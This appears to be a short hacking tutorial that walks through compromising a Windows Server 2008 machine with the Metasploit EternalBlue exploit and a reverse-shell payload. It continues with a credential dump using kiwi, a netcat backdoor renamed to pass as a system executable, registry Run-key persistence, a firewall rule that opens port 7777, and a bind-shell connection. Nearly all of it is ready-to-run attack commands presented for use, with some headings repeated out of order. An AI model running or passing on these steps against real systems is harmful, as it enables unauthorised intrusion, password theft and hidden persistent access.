Hi All Today im going to show how to hack Windows Server 2008 with Fresh installation
All you can find thing by looking at following Video
Get a terminal
#metasploit
To Load cmd.exe
All you can find thing by looking at following Video
These are the commands
Find and load Exploit
Get a terminal
#metasploit
msf5 > search eternalblue
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.43.42 [Your target ip]
msf5 exploit(windows/smb/ms17_010_eternalblue) > show payloads
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.43.244 [Your ip]
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
After exploit we can execute this
To Load cmd.exe
meterpreter > shell
C:\Windows\system32>whoami
C:\Windows\system32>exit
To get all Usernames and Passwords
meterpreter >
meterpreter > load kiwi
meterpreter > creds_all
Upload netcat to server and rename it a look like system executable
meterpreter > upload /usr/share/windows-binaries/nc.exe svchostn.exe
meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v svchostn -d 'C:\Windows\system32\svchostn.exe -Ldp 7777 -e cmd.exe'
meterpreter > reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v svchostn
View Firewall Rules and apply new rules
meterpreter > shell
C:\Windows\system32>netsh firewall show opmode
C:\Windows\system32>
netsh advfirewall firewall add rule name="Service Window" dir=in action=allow protocol=TCP localport=7777
C:\Windows\system32>exit
meterpreter > execute -f svchostn.exe -Ldp 7777 -e cmd.exe
On New window
nc 192.168.43.42 7777